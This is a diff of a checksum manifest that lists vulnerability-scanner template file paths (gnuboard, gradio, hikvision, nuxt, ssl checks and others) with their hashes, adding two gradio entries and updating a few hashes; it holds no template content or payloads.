http/vulnerabilities/gnuboard/gnuboard5-rxss.yaml:8d551aa4f723d8e79ee57beb2f491c86f5b6cffc
|
http/vulnerabilities/gnuboard/gnuboard5-rxss.yaml:8d551aa4f723d8e79ee57beb2f491c86f5b6cffc
|
||||||
http/vulnerabilities/gnuboard/gnuboard5-xss.yaml:83312ba18791464992c70dd4fe10965ba1ed2244
|
http/vulnerabilities/gnuboard/gnuboard5-xss.yaml:83312ba18791464992c70dd4fe10965ba1ed2244
|
||||||
|
http/vulnerabilities/gradio/gradio-lfi.yaml:a69850b3a69de67b39650086e3b710acd4ae465b
|
||||||
|
http/vulnerabilities/gradio/gradio-ssrf.yaml:c0a20caa4fb295071efb720890b54bee093c0fda
|
||||||
http/vulnerabilities/grafana/grafana-file-read.yaml:7f8fa8a6408dbbd25e7c33bc203024a131b85704
|
http/vulnerabilities/grafana/grafana-file-read.yaml:7f8fa8a6408dbbd25e7c33bc203024a131b85704
|
||||||
http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml:02a334888358c47036d90f4d0fff958976da7f5f
|
http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml:02a334888358c47036d90f4d0fff958976da7f5f
|
||||||
http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml:bc54a4c9f7771c524140f1840157c03bf4651a54
|
http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml:bc54a4c9f7771c524140f1840157c03bf4651a54
|
||||||
|
@ -7717,7 +7733,7 @@ http/vulnerabilities/netsweeper/netsweeper-rxss.yaml:7ee726ace09d4659b2f3980105a
|
||||||
http/vulnerabilities/nps/nps-auth-bypass.yaml:90ea2e05d4bf385db0ceee0c92415817731d8a15
|
http/vulnerabilities/nps/nps-auth-bypass.yaml:90ea2e05d4bf385db0ceee0c92415817731d8a15
|
||||||
http/vulnerabilities/nuxt/nuxt-js-lfi.yaml:d51646219a3065dbf4024260104c2513d9e516d3
|
http/vulnerabilities/nuxt/nuxt-js-lfi.yaml:d51646219a3065dbf4024260104c2513d9e516d3
|
||||||
http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml:24cfa8b0b2dbd99b1eb75704e139da55e275274f
|
http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml:24cfa8b0b2dbd99b1eb75704e139da55e275274f
|
||||||
http/vulnerabilities/nuxt/nuxt-js-xss.yaml:136a0b904e00e30b73c966536aa6f4110be49e39
|
http/vulnerabilities/nuxt/nuxt-js-xss.yaml:9d37aae5f57e72101d40715ef24bb1fa7cf527d4
|
||||||
http/vulnerabilities/opencpu/opencpu-rce.yaml:d13458a710e74a36c6b74a216677b4a40a9562d0
|
http/vulnerabilities/opencpu/opencpu-rce.yaml:d13458a710e74a36c6b74a216677b4a40a9562d0
|
||||||
http/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml:cbfc4feae73c9796e2cde0471a9891ae967a1655
|
http/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml:cbfc4feae73c9796e2cde0471a9891ae967a1655
|
||||||
http/vulnerabilities/oracle/oracle-ebs-xss.yaml:a395970ecf5cd11fc483b759836bc4402f2489ce
|
http/vulnerabilities/oracle/oracle-ebs-xss.yaml:a395970ecf5cd11fc483b759836bc4402f2489ce
|
||||||
|
@ -8646,7 +8662,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a
|
||||||
ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19
|
ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19
|
||||||
ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89
|
ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89
|
||||||
ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210
|
ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210
|
||||||
templates-checksum.txt:73a443496d5bda8552e1e38ab4b09951ff8b0139
|
templates-checksum.txt:86bac7e8379bf85b45635c5c2ba0558fa72032eb
|
||||||
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
|
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
|
||||||
workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0
|
workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0
|
||||||
workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4
|
workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4
|
||||||
|
|
Loading…
Reference in New Issue